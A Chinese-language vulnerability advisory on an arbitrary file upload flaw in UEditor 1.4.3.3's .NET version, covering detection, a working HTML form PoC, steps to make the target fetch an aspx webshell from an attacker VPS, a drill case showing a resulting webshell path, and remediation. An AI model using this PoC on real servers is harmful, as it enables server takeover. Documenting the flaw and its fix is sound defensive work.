01 漏洞描述

UEditor是一款所见即所得的开源富文本编辑器，具有轻量、可定制、用户体验优秀等特点，被广大WEB应用程序所使用。

Ueditor编辑器.net版本存在任意文件上传漏洞，其他的php，jsp，asp版本不受此UEditor的漏洞的影响，.net版本漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞，攻击者可精心构造环境上传文件，获取服务器管理权限。

02 影响范围

UEditor v1.4.3.3

03 验证方式

尝试访问路径http://xxx.xxx.xxx.xxx/Content/ueditor/net/controller.ashx?action=catchimage，若页面提示“参数错误：没有指定抓取源”时，则说明存在该漏洞

04 利用方式

1、本地新建poc.html文件，文件内容如下，其中需将action修改成目标漏洞路径

<form action=" http://xxx.com/Content/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">
  <p>shell addr:<input type="text" name="source[]" /></p >
  <input type="submit" value="Submit" />
</form>

2、制作aspx图片马上传至VPS并在所在目录启动http服务

3、打开poc.html后，输入vps的图片马地址，成功上传至目标服务器后，会返回webshell访问地址

4、使用Webshell管理工具连接指定地址即可成功连接webshell

05 实战案例

某攻防演练中对IP进行端口扫描，发现8081端口下存在目录遍历，可查看到存在UEditor编辑器

进一步验证后，确定存在UEditor编辑器，且UEditor v1.4.3.3版本存在文件上传漏洞



利用“04节利用方式”成功文件上传getshell，获得Webshell路径信息

http://xx.xx.xx.xx:8001/content/UEditor1.4.3.3/net/upload/image/2023xxxx/63774608303513671xxxx09140.ashx

而后成功连接Webshell，进行文件管理等。

06 修复方案

1、修改工程目录下net/App_Code/CrawlerHandler.cs文件，添加对文件类型检查的代码。

2、使用各类WAF软件，防止攻击者上传恶意文件。

3、检查文件上传路径下是否有近期上传的畸形图片；检查是否存在asp，aspx等类型危险文件。如果发现异常文件，请判断后及时删除。

4、升级至UEditor安全版本：http://ueditor.baidu.com/website/index.html